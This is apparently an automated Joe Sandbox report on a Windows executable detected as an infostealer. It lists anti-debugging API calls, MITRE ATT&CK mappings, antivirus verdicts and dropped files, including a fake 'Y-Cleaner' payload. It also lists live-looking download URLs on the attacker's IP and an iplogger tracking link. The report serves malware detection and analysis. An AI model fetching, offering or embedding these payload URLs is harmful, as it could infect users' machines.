Source: C:\Users\user\Desktop\zmTSHkabY6.exeCode function: 0_2_00E8092B mov eax, dword ptr fs:[00000030h]0_2_00E8092B
Source: C:\Users\user\Desktop\zmTSHkabY6.exeCode function: 0_2_00E80D90 mov eax, dword ptr fs:[00000030h]0_2_00E80D90
Source: C:\Users\user\Desktop\zmTSHkabY6.exeCode function: 0_2_00402C70 SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,VirtualAlloc,VirtualAlloc,VirtualAlloc,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,0_2_00402C70
Source: C:\Users\user\Desktop\zmTSHkabY6.exeCode function: 0_2_0040C0B3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0040C0B3
Source: C:\Users\user\Desktop\zmTSHkabY6.exeCode function: 0_2_00409949 SetUnhandledExceptionFilter,0_2_00409949
Source: C:\Users\user\Desktop\zmTSHkabY6.exeCode function: 0_2_00408ED5 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00408ED5
Source: C:\Users\user\Desktop\zmTSHkabY6.exeCode function: 0_2_004097B2 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_004097B2
Source: C:\Users\user\Desktop\zmTSHkabY6.exeCode function: 0_2_10002ADF SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_10002ADF
Source: C:\Users\user\Desktop\zmTSHkabY6.exeCode function: 0_2_00E8913C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00E8913C
Source: C:\Users\user\Desktop\zmTSHkabY6.exeCode function: 0_2_00E89A19 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00E89A19
Source: C:\Users\user\Desktop\zmTSHkabY6.exeCode function: 0_2_00E89BB0 SetUnhandledExceptionFilter,0_2_00E89BB0
Source: C:\Users\user\Desktop\zmTSHkabY6.exeCode function: 0_2_00E8C31A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00E8C31A
Source: zmTSHkabY6.exe, zmTSHkabY6.exe, 00000000.00000002.3220112390.000000000099D000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: 'Program Manager
Source: C:\Users\user\Desktop\zmTSHkabY6.exeCode function: 0_2_004099B3 cpuid 0_2_004099B3
Source: C:\Users\user\Desktop\zmTSHkabY6.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\zmTSHkabY6.exeCode function: 0_2_00409BE5 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00409BE5
Source: Amcache.hve.7.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.7.drBinary or memory string: msmpeng.exe
Source: Amcache.hve.7.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.7.drBinary or memory string: MsMpEng.exe

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts3
Command and Scripting Interpreter		1
DLL Side-Loading		2
Process Injection		11
Masquerading		OS Credential Dumping1
System Time Discovery		Remote Services1
Archive Collected Data		2
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading		24
Virtualization/Sandbox Evasion		LSASS Memory781
Security Software Discovery		Remote Desktop ProtocolData from Removable Media12
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)2
Process Injection		Security Account Manager24
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared Drive1
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Deobfuscate/Decode Files or Information		NTDS3
Process Discovery		Distributed Component Object ModelInput Capture11
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script3
Obfuscated Files or Information		LSA Secrets1
Application Window Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts13
Software Packing		Cached Domain Credentials1
File and Directory Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
Timestomp		DCSync223
System Information Discovery		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
DLL Side-Loading		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
zmTSHkabY6.exe57%VirustotalBrowse
zmTSHkabY6.exe42%ReversingLabsWin32.Infostealer.Generic
zmTSHkabY6.exe100%AviraHEUR/AGEN.1320706
zmTSHkabY6.exe100%Joe Sandbox ML

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\soft[1]100%Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\eDe4265J80SwdwreJA5DKe\Y-Cleaner.exe100%Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\soft[1]75%ReversingLabsByteCode-MSIL.Trojan.Malgent
C:\Users\user\AppData\Local\Temp\eDe4265J80SwdwreJA5DKe\Y-Cleaner.exe75%ReversingLabsByteCode-MSIL.Trojan.Malgent

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

NameMaliciousAntivirus DetectionReputation
http://185.156.73.23/add?substr=mixtwo&s=three&sub=empfalse
    		unknown
    http://185.156.73.23/dll/downloadfalse
      		unknown
      http://185.156.73.23/files/downloadfalse
        		unknown
        http://185.156.73.23/dll/keyfalse
          		unknown
          http://185.156.73.23/soft/downloadfalse
            		unknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://185.156.73.23/files/downloadJzmTSHkabY6.exe, 00000000.00000003.2491315087.0000000005834000.00000004.00000020.00020000.00000000.sdmp, zmTSHkabY6.exe, 00000000.00000003.2429953901.0000000005834000.00000004.00000020.00020000.00000000.sdmpfalse
              		unknown
              http://185.156.73.23/files/download00zmTSHkabY6.exe, 00000000.00000003.2526387694.0000000005834000.00000004.00000020.00020000.00000000.sdmpfalse
                		unknown
                http://185.156.73.23/files/download4zmTSHkabY6.exe, 00000000.00000003.2491315087.0000000005834000.00000004.00000020.00020000.00000000.sdmpfalse
                  		unknown
                  http://185.156.73.23/files/download://1HzmTSHkabY6.exe, 00000000.00000003.2773777883.0000000005834000.00000004.00000020.00020000.00000000.sdmp, zmTSHkabY6.exe, 00000000.00000003.2644398463.0000000005834000.00000004.00000020.00020000.00000000.sdmp, zmTSHkabY6.exe, 00000000.00000003.2617109524.0000000005834000.00000004.00000020.00020000.00000000.sdmp, zmTSHkabY6.exe, 00000000.00000003.2751522226.0000000005834000.00000004.00000020.00020000.00000000.sdmp, zmTSHkabY6.exe, 00000000.00000003.2681187095.0000000005834000.00000004.00000020.00020000.00000000.sdmp, zmTSHkabY6.exe, 00000000.00000003.2716404410.0000000005834000.00000004.00000020.00020000.00000000.sdmpfalse
                    		unknown
                    http://185.156.73.23/files/downloadtzmTSHkabY6.exe, 00000000.00000003.2546745947.0000000005834000.00000004.00000020.00020000.00000000.sdmp, zmTSHkabY6.exe, 00000000.00000003.2526387694.0000000005834000.00000004.00000020.00020000.00000000.sdmpfalse
                      		unknown
                      https://g-cleanit.hkzmTSHkabY6.exe, 00000000.00000003.2881415496.000000000576A000.00000004.00000020.00020000.00000000.sdmp, zmTSHkabY6.exe, 00000000.00000003.2881415496.0000000005725000.00000004.00000020.00020000.00000000.sdmp, zmTSHkabY6.exe, 00000000.00000003.2882255970.00000000056D7000.00000004.00000020.00020000.00000000.sdmp, zmTSHkabY6.exe, 00000000.00000003.2881735565.000000000576B000.00000004.00000020.00020000.00000000.sdmp, soft[1].0.dr, Y-Cleaner.exe.0.drfalse
                        		high
                        http://185.156.73.23/soft/download$MXzmTSHkabY6.exe, 00000000.00000002.3220957858.0000000000E37000.00000004.00000020.00020000.00000000.sdmpfalse
                          		unknown
                          http://185.156.73.23/soft/downloadVzmTSHkabY6.exe, 00000000.00000003.2881735565.0000000005834000.00000004.00000020.00020000.00000000.sdmpfalse
                            		unknown
                            http://185.156.73.23/files/downloadxzmTSHkabY6.exe, 00000000.00000003.2773777883.0000000005834000.00000004.00000020.00020000.00000000.sdmp, zmTSHkabY6.exe, 00000000.00000003.2751522226.0000000005834000.00000004.00000020.00020000.00000000.sdmp, zmTSHkabY6.exe, 00000000.00000003.2716404410.0000000005834000.00000004.00000020.00020000.00000000.sdmpfalse
                              		unknown
                              http://185.156.73.23/files/downloadZzmTSHkabY6.exe, 00000000.00000003.2773777883.0000000005834000.00000004.00000020.00020000.00000000.sdmp, zmTSHkabY6.exe, 00000000.00000003.2644398463.0000000005834000.00000004.00000020.00020000.00000000.sdmp, zmTSHkabY6.exe, 00000000.00000003.2617109524.0000000005834000.00000004.00000020.00020000.00000000.sdmp, zmTSHkabY6.exe, 00000000.00000003.2751522226.0000000005834000.00000004.00000020.00020000.00000000.sdmp, zmTSHkabY6.exe, 00000000.00000003.2681187095.0000000005834000.00000004.00000020.00020000.00000000.sdmp, zmTSHkabY6.exe, 00000000.00000003.2716404410.0000000005834000.00000004.00000020.00020000.00000000.sdmpfalse
                                		unknown
                                http://upx.sf.netAmcache.hve.7.drfalse
                                  		high
                                  http://185.156.73.23/soft/download://1HzmTSHkabY6.exe, 00000000.00000003.2881735565.0000000005834000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		unknown
                                    http://185.156.73.23/dll/downloadVMjzmTSHkabY6.exe, 00000000.00000002.3220957858.0000000000E37000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		unknown
                                      http://www.ccleaner.comqhttps://take.rdrct-now.online/go/ZWKA?p78705p298845p1174zmTSHkabY6.exe, 00000000.00000003.2881415496.000000000576A000.00000004.00000020.00020000.00000000.sdmp, zmTSHkabY6.exe, 00000000.00000003.2881415496.0000000005725000.00000004.00000020.00020000.00000000.sdmp, zmTSHkabY6.exe, 00000000.00000003.2882255970.00000000056D7000.00000004.00000020.00020000.00000000.sdmp, zmTSHkabY6.exe, 00000000.00000003.2881735565.000000000576B000.00000004.00000020.00020000.00000000.sdmp, soft[1].0.dr, Y-Cleaner.exe.0.drfalse
                                        		high
                                        http://185.156.73.23/files/downloadbzmTSHkabY6.exe, 00000000.00000003.2773777883.0000000005834000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		unknown
                                          https://iplogger.org/1Pz8p7zmTSHkabY6.exe, 00000000.00000003.2881415496.000000000576A000.00000004.00000020.00020000.00000000.sdmp, zmTSHkabY6.exe, 00000000.00000003.2881415496.0000000005725000.00000004.00000020.00020000.00000000.sdmp, zmTSHkabY6.exe, 00000000.00000003.2882255970.00000000056D7000.00000004.00000020.00020000.00000000.sdmp, zmTSHkabY6.exe, 00000000.00000003.2881735565.000000000576B000.00000004.00000020.00020000.00000000.sdmp, soft[1].0.dr, Y-Cleaner.exe.0.drfalse
                                            		high
                                            http://185.156.73.23/soft/downloadtMzmTSHkabY6.exe, 00000000.00000002.3220957858.0000000000E37000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		unknown

                                              World Map of Contacted IPs

                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs

                                              Public IPs

                                              IPDomainCountryFlagASNASN NameMalicious
                                              185.156.73.23
                                              		unknownRussian Federation
                                              		48817RELDAS-NETRUfalse

                                              General Information

                                              Joe Sandbox version:41.0.0 Charoite
                                              Analysis ID:1578897
                                              Start date and time:2024-12-20 16:21:07 +01:00
                                              Joe Sandbox product:CloudBasic
                                              Overall analysis duration:0h 9m 14s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                              Number of analysed new started processes analysed:10
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:0
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Sample name:zmTSHkabY6.exe
                                              renamed because original name is a hash value
                                              Original Sample Name:cab7af24073c5c1c62a2957dd5983c98.exe
                                              Detection:MAL
                                              Classification:mal100.evad.winEXE@2/15@0/1
                                              EGA Information:
                                              • Successful, ratio: 100%
                                              HCA Information:Failed
                                              Cookbook Comments:
                                              • Found application associated with file extension: .exe
                                              • Override analysis time to 240s for sample files taking high CPU consumption

                                              Warnings

                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                              • Excluded IPs from analysis (whitelisted): 20.189.173.21, 172.202.163.200, 13.107.246.63, 20.190.181.1
                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                              • Not all processes where analyzed, report is missing behavior information
                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                              Simulations

                                              Behavior and APIs

                                              TimeTypeDescription
                                              10:22:54API Interceptor1651655x Sleep call for process: zmTSHkabY6.exe modified
                                              10:24:36API Interceptor1x Sleep call for process: WerFault.exe modified

                                              Joe Sandbox View / Context

                                              IPs

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              185.156.73.238V0INSl0E2.exeGet hashmaliciousUnknownBrowse
                                              • 185.156.73.23/soft/download
                                              BEd2lJRXFM.exeGet hashmaliciousUnknownBrowse
                                              • 185.156.73.23/soft/download

                                              Domains

                                              No context

                                              ASNs

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              RELDAS-NETRU8V0INSl0E2.exeGet hashmaliciousUnknownBrowse
                                              • 185.156.73.23
                                              BEd2lJRXFM.exeGet hashmaliciousUnknownBrowse
                                              • 185.156.73.23
                                              beacon.exeGet hashmaliciousCobaltStrikeBrowse
                                              • 185.156.73.37

                                              JA3 Fingerprints

                                              No context

                                              Dropped Files

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\soft[1]8V0INSl0E2.exeGet hashmaliciousUnknownBrowse
                                                BEd2lJRXFM.exeGet hashmaliciousUnknownBrowse
                                                  file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                    file.exeGet hashmaliciousUnknownBrowse
                                                      file.exeGet hashmaliciousUnknownBrowse
                                                        file.exeGet hashmaliciousUnknownBrowse
                                                          file.exeGet hashmaliciousUnknownBrowse
                                                            file.exeGet hashmaliciousUnknownBrowse
                                                              file.exeGet hashmaliciousAmadey, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                                file.exeGet hashmaliciousUnknownBrowse

                                                                  Created / dropped Files

                                                                  C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_zmTSHkabY6.exe_e643bf96f5e75ffe1906c95a3359dd785afc318_33a0114a_aec1dd16-9074-4b30-ab4d-938fecaa0ca7\Report.wer

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):65536
                                                                  Entropy (8bit):0.9857242087215285
                                                                  Encrypted:false
                                                                  SSDEEP:192:jjYfbbblUQ0Co1nh1qjudvszuiFsZ24IO8i6:apUrCo1nh1qjPzuiFsY4IO8i
                                                                  MD5:CFB3AA96B4C8FD8014C331905B15E8C2
                                                                  SHA1:D4E036297E2684DE62E29AD39B7A32339BCFCDB2
                                                                  SHA-256:863D2FAC42236843ED1EDA15110E7AF637328ACF30BC75F2E8F327340D971064
                                                                  SHA-512:BBEA867CDDBD8FC1B89E5874450B80184C2AAA828D99914DC990F8D094B2EB15D5AFB144370A7AB1409E2F6CF4C17B845E786E79201D84357DFC9A2F7C6CBF3B
                                                                  Malicious:true
                                                                  Reputation:low
                                                                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.9.1.8.1.8.4.3.2.7.0.8.7.6.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.9.1.8.1.8.4.3.8.0.2.0.9.4.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.e.c.1.d.d.1.6.-.9.0.7.4.-.4.b.3.0.-.a.b.4.d.-.9.3.8.f.e.c.a.a.0.c.a.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.9.6.4.3.3.a.6.-.0.7.9.c.-.4.f.3.e.-.b.b.7.c.-.b.f.2.4.d.9.7.9.b.c.f.1.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.z.m.T.S.H.k.a.b.Y.6...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.9.7.8.-.0.0.0.1.-.0.0.1.4.-.a.0.8.f.-.f.9.f.7.f.2.5.2.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.4.3.a.d.3.0.b.d.f.4.d.8.d.c.e.f.d.3.c.9.d.0.4.6.c.a.9.9.8.7.0.0.0.0.0.0.f.f.f.f.!.0.0.0.0.a.4.1.a.4.2.e.8.4.9.9.9.5.0.3.c.f.7.6.b.0.4.e.d.e.f.e.3.c.3.7.f.8.7.0.2.3.2.8.5.!.z.m.T.S.H.k.a.b.Y.6...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.

                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERB947.tmp.dmp

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                  File Type:Mini DuMP crash report, 14 streams, Fri Dec 20 15:24:03 2024, 0x1205a4 type
                                                                  Category:dropped
                                                                  Size (bytes):46310
                                                                  Entropy (8bit):2.549488396992911
                                                                  Encrypted:false
                                                                  SSDEEP:192:NCtEdiXC1tLXqLCOioGF9Z67nt6NVMoEsUjTWNZR9TLHKmC4yUNOmjvTR9Y9JnvW:cm1tmZPGF6Dt6NSQkTKHe4yiPpKvOS4b
                                                                  MD5:3881907AA5874950FB8B1BAF71A478A7
                                                                  SHA1:36B4C78F42D1D9DCAF00D30D172E81A302F2FC72
                                                                  SHA-256:3A7779D05F8A44A663EA74008B194209D556B580D79CF94E6E99D8E781FE6AFD
                                                                  SHA-512:2D60FCAFF3B9462A82A4A3ACE8324C765004A36B4BBEE71612EC7F170F9A4A8BDEAA6450765DE75C6B71010EF0E8A0EC4951CD4862636904DC87A0BF2F796B71
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview:MDMP..a..... .........eg............4...........8...<.......D....,..........T.......8...........T............A...s..........t...........` ..............................................................................eJ....... ......GenuineIntel............T.......x.....eg....J........................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERBA32.tmp.WERInternalMetadata.xml

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):8396
                                                                  Entropy (8bit):3.6961863290447483
                                                                  Encrypted:false
                                                                  SSDEEP:192:R6l7wVeJGjl6z06Y93SUv1QgmfSz1zOpDM89b2psf04Sm:R6lXJIl6A6Y9SU9QgmfSz1zq2Cfl
                                                                  MD5:362D1477D38829E905AA1FA8C120C61B
                                                                  SHA1:87594C8A83987827A1248454B9331AF242E550D8
                                                                  SHA-256:4F1639B396F035A5C16BF42B4C25932DE9CB2760A08A9E9AAD82DDF866CDEFA2
                                                                  SHA-512:DAAD8A4AA345D189CDCC7DFE693A3B256DC80125953C62B343751CC253CAD3C6A7B035C3FBEE090DE73D64C9903C2BC6FC9E5D1DEE8EBB5F07F6156145E0C47C
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.4.2.4.<./.P.i.

                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERBA72.tmp.xml

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):4680
                                                                  Entropy (8bit):4.463865262497597
                                                                  Encrypted:false
                                                                  SSDEEP:48:cvIwWl8zsjJg77aI93cWpW8VYrYm8M4JU+Fs/+q8var1EzL1d:uIjf9I7dV7VvJ+K61EzL1d
                                                                  MD5:FCCB18AD1BB3678DD2FDF913944D5652
                                                                  SHA1:D53F1CFB004F374A2FD05E5C1623A62094AA8C26
                                                                  SHA-256:63C811B8153FA0F57923619FBD53FF4DDE736281E6C301C645146E7CCA9D9A94
                                                                  SHA-512:12139ACABE5A4674D5B03CFAB18BCBE1DCDE0B052C934FB34AB243F688A1ED5336619D759D70AAA078C96D69203724D2A2E6FC3B682281EDEC10E596445D5E21
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="639746" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\add[1].htm

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\zmTSHkabY6.exe
                                                                  File Type:very short file (no magic)
                                                                  Category:dropped
                                                                  Size (bytes):1
                                                                  Entropy (8bit):0.0
                                                                  Encrypted:false
                                                                  SSDEEP:3:V:V
                                                                  MD5:CFCD208495D565EF66E7DFF9F98764DA
                                                                  SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                                                  SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                                                  SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                                                  Malicious:false
                                                                  Reputation:high, very likely benign file
                                                                  Preview:0

                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\dll[1]

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\zmTSHkabY6.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):214000
                                                                  Entropy (8bit):6.5511536448557735
                                                                  Encrypted:false
                                                                  SSDEEP:3072:Z5G1b0q6QpxILDXGGMOmMjMpI6qe9C5jwQw2hWHcH0:SIQpxILDXGGMO7Ice9C5kQw2hWHcH0
                                                                  MD5:6F0C19CD2E68B52C50BFD34A733C3524
                                                                  SHA1:3542EEC360C3812863D28A12AF96C31BC9CC0164
                                                                  SHA-256:7EA56914148B572BAAADA38008CD70846A7240737B242BC8AC421531EF347632
                                                                  SHA-512:F9DAAF33BA25E5046CB459AB9D4198BCD3ACCC738C5E127D7B8FDC25FC18FF966B569747B241CA8DA1DFE0066E8D443B950019D31BD96A9D901D9FE4167190EC
                                                                  Malicious:true
                                                                  Reputation:low
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Jl.X...........!..................... ........... ....................... ............@.....................................W.................................................................................... ............... ..H............text...4.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........`..4e...........U..............................................}.Y.y.=.{.X.x.=..r...p.o2....o...(3.....o2...}....*:..s.....(....*.......*2r...p(;...&*Vr...p.....r...p.....*..(....*>.........}....*...(C.....o...(D...(E...}.....(F...(E...(G...&*>.........}....*...(C.....o...(D...}.....(F...(E...(H...&*".......*>.........}....*R..} .....{ ...oo...*..{ ...*"..}!...*..{!...*...}.....{#....{....op....{....,...{ ...oo...*..{!...oo...*..{....*B.....su...(v...*..{#....{#...

                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\download[1].htm

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\zmTSHkabY6.exe
                                                                  File Type:very short file (no magic)
                                                                  Category:dropped
                                                                  Size (bytes):1
                                                                  Entropy (8bit):0.0
                                                                  Encrypted:false
                                                                  SSDEEP:3:V:V
                                                                  MD5:CFCD208495D565EF66E7DFF9F98764DA
                                                                  SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                                                  SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
